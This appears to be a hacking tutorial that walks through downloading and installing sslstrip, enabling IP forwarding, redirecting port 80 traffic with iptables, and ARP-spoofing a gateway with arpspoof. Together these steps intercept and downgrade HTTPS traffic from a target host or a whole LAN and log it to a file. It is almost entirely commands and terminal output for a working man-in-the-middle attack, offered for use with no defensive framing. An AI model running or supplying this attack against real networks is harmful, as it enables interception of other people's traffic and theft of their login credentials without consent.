Setting up sslstrip for man in the middle attacks

1. This tutorial will show you how to setup sslstrip. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial.
2.  
3. Aren't you excited?!
4.  
5. Open a terminal window
6.  
7. Download sslstrip from:
8. http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
9.  
10. With this command:
11. wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
12.  
13. #BEGIN TERMINAL OUTPUT
14. root@bt:~# wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
15. --2011-12-05 01:35:11-- http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
16. Resolving www.thoughtcrime.org... 72.14.190.145
17. Connecting to www.thoughtcrime.org|72.14.190.145|:80... connected.
18. HTTP request sent, awaiting response... 200 OK
19. Length: 22198 (22K) [application/x-gzip]
20. Saving to: `sslstrip-0.9.tar.gz'
21.  
22. 100%[====================================================================================>] 22,198 --.-K/s in 0.07s
23.  
24. 2011-12-05 01:35:11 (306 KB/s) - `sslstrip-0.9.tar.gz' saved [22198/22198]
25. #END TERMINAL OUTPUT
26.  
27. Extract the package "sslstrip-0.9.tar.gz" with the following command:
28. tar -zxvf sslstrip-0.9.tar.gz
29.  
30. #BEGIN TERMINAL OUTPUT
31. root@bt:~# tar -zxvf sslstrip-0.9.tar.gz
32. sslstrip-0.9/
33. sslstrip-0.9/README
34. sslstrip-0.9/COPYING
35. sslstrip-0.9/setup.py
36. sslstrip-0.9/sslstrip/
37. sslstrip-0.9/sslstrip/StrippingProxy.py
38. sslstrip-0.9/sslstrip/SSLServerConnection.py
39. sslstrip-0.9/sslstrip/ServerConnectionFactory.py
40. sslstrip-0.9/sslstrip/ClientRequest.py
41. sslstrip-0.9/sslstrip/ServerConnection.py
42. sslstrip-0.9/sslstrip/CookieCleaner.py
43. sslstrip-0.9/sslstrip/__init__.py
44. sslstrip-0.9/sslstrip/DnsCache.py
45. sslstrip-0.9/sslstrip/URLMonitor.py
46. sslstrip-0.9/lock.ico
47. sslstrip-0.9/sslstrip.py
48. #END TERMINAL OUTPUT
49.  
50. You also need to make sure you have python 2.5 or greater and the python "twisted web" module installed.
51. Install them like this:
52. apt-get install python python-twisted-web
53.  
54.  
55. In my case they were already installed:
56.  
57. #BEGIN TERMINAL OUTPUT
58. root@bt:~# apt-get install python python-twisted-web
59. Reading package lists... Done
60. Building dependency tree
61. Reading state information... Done
62. python is already the newest version.
63. python-twisted-web is already the newest version.
64. 0 upgraded, 0 newly installed, 0 to remove and 38 not upgraded.
65. #END TERMINAL OUTPUT
66.  
67.  
68. Now change to the "sslstrip-0.9" directory:
69. cd sslstrip-0.9
70.  
71. #BEGIN TERMINAL OUTPUT
72. root@bt:~# cd sslstrip-0.9
73. root@bt:~/sslstrip-0.9# ls
74. COPYING lock.ico README setup.py sslstrip sslstrip.py
75. #END TERMINAL OUTPUT
76.  
77. Run the command:
78. python ./setup.py install
79.  
80. #BEGIN TERMINAL OUTPUT
81. root@bt:~/sslstrip-0.9# python ./setup.py install
82. running install
83. running build
84. running build_py
85. creating build
86. creating build/lib.linux-x86_64-2.6
87. creating build/lib.linux-x86_64-2.6/sslstrip
88. copying sslstrip/CookieCleaner.py -> build/lib.linux-x86_64-2.6/sslstrip
89. copying sslstrip/ServerConnectionFactory.py -> build/lib.linux-x86_64-2.6/sslstrip
90. copying sslstrip/ServerConnection.py -> build/lib.linux-x86_64-2.6/sslstrip
91. copying sslstrip/StrippingProxy.py -> build/lib.linux-x86_64-2.6/sslstrip
92. copying sslstrip/ClientRequest.py -> build/lib.linux-x86_64-2.6/sslstrip
93. copying sslstrip/__init__.py -> build/lib.linux-x86_64-2.6/sslstrip
94. copying sslstrip/DnsCache.py -> build/lib.linux-x86_64-2.6/sslstrip
95. copying sslstrip/SSLServerConnection.py -> build/lib.linux-x86_64-2.6/sslstrip
96. copying sslstrip/URLMonitor.py -> build/lib.linux-x86_64-2.6/sslstrip
97. running build_scripts
98. creating build/scripts-2.6
99. copying and adjusting sslstrip/sslstrip -> build/scripts-2.6
100. changing mode of build/scripts-2.6/sslstrip from 644 to 755
101. running install_lib
102. creating /usr/local/lib/python2.6/dist-packages/sslstrip
103. copying build/lib.linux-x86_64-2.6/sslstrip/CookieCleaner.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
104. copying build/lib.linux-x86_64-2.6/sslstrip/ServerConnectionFactory.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
105. copying build/lib.linux-x86_64-2.6/sslstrip/ServerConnection.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
106. copying build/lib.linux-x86_64-2.6/sslstrip/StrippingProxy.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
107. copying build/lib.linux-x86_64-2.6/sslstrip/ClientRequest.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
108. copying build/lib.linux-x86_64-2.6/sslstrip/__init__.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
109. copying build/lib.linux-x86_64-2.6/sslstrip/DnsCache.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
110. copying build/lib.linux-x86_64-2.6/sslstrip/SSLServerConnection.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
111. copying build/lib.linux-x86_64-2.6/sslstrip/URLMonitor.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
112. byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/CookieCleaner.py to CookieCleaner.pyc
113. byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnectionFactory.py to ServerConnectionFactory.pyc
114. byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnection.py to ServerConnection.pyc
115. byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/StrippingProxy.py to StrippingProxy.pyc
116. byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/ClientRequest.py to ClientRequest.pyc
117. byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/__init__.py to __init__.pyc
118. byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/DnsCache.py to DnsCache.pyc
119. byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/SSLServerConnection.py to SSLServerConnection.pyc
120. byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/URLMonitor.py to URLMonitor.pyc
121. running install_scripts
122. copying build/scripts-2.6/sslstrip -> /usr/local/bin
123. changing mode of /usr/local/bin/sslstrip to 755
124. running install_data
125. creating /usr/local/share/sslstrip
126. copying README -> /usr/local/share/sslstrip
127. copying COPYING -> /usr/local/share/sslstrip
128. copying lock.ico -> /usr/local/share/sslstrip
129. running install_egg_info
130. Writing /usr/local/lib/python2.6/dist-packages/sslstrip-0.9.egg-info
131. Cleaning up...
132. #END TERMINAL OUTPUT
133.  
134.  
135. Now we need to turn on IP forwarding, run this command:
136. echo "1" > /proc/sys/net/ipv4/ip_forward
137.  
138.  
139. Ok, iptables has got to be setup to redirect HTTP traffic to sslstrip:
140. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>
141.  
142. Change the <listenPort> above to an ephemeral port. Something like 30000 should do.
143. So it should look like this:
144. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 30000
145.  
146.  
147. Now we are going to execute sslstrip, run this command:
148. sslstrip -a -l 30000 -w secret.log
149.  
150. The listening port will be whatever you chose for iptables to redirect HTTP traffic too.
151.  
152. #BEGIN TERMINAL OUTPUT
153. root@bt:~/sslstrip-0.9# sslstrip -a -l 30000 -w secret.log
154.  
155. sslstrip 0.9 by Moxie Marlinspike running...
156. #END TERMINAL OUTPUT
157.  
158. Notice above in the terminal output. Don't kill the terminal session. sslstrip is running!
159.  
160. Open a new terminal window.
161.  
162. Now we need to setup arpspoof so the network will think you are the gateway or router. This way all traffic is sent to your machine first, then forwarded to the proper gateway on your network.
163. arpspoof -i <interface> -t <targetIP> <gatewayIP>
164.  
165. If you don't know your interface setting, just run a quick "ifconfig" command and it will list it. The <gatewayIP> is the networks real gateway/router, this is the traffic we want to hijack.
166. If you want arpspoof to intercept traffic across the whole LAN run:
167. arpspoof -i <interface> <gatewayIP>
168.  
169. So, I would run the command like this:
170. arpspoof -i eth0 -t 10.10.1.20 10.10.1.254
171.  
172. #BEGIN TERMINAL OUTPUT
173. root@bt:~# arpspoof -i eth0 10.10.1.254
174. 0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
175. 0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
176. 0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
177. 0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
178. 0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
179. 0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
180. 0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
181. #END TERMINAL OUTPUT
182.  
183. Notice above in the terminal output, you will constantly receive arp replies, just let it run. Don't kill the terminal session.
184.  
185. If you need additional help just run:
186. sslstrip --help
187.  
188. #BEGIN TERMINAL OUTPUT
189. root@bt:~/sslstrip-0.9# sslstrip --help
190.  
191. sslstrip 0.9 by Moxie Marlinspike
192. Usage: sslstrip <options>
193.  
194. Options:
195. -w <filename>, --write=<filename> Specify file to log to (optional).
196. -p , --post Log only SSL POSTs. (default)
197. -s , --ssl Log all SSL traffic to and from server.
198. -a , --all Log all SSL and HTTP traffic to and from server.
199. -l <port>, --listen=<port> Port to listen on (default 10000).
200. -f , --favicon Substitute a lock favicon on secure requests.
201. -k , --killsessions Kill sessions in progress.
202. -h Print this help message.
203. #END TERMINAL OUTPUT
204.  
205.  
206. That's it...have fun!
207.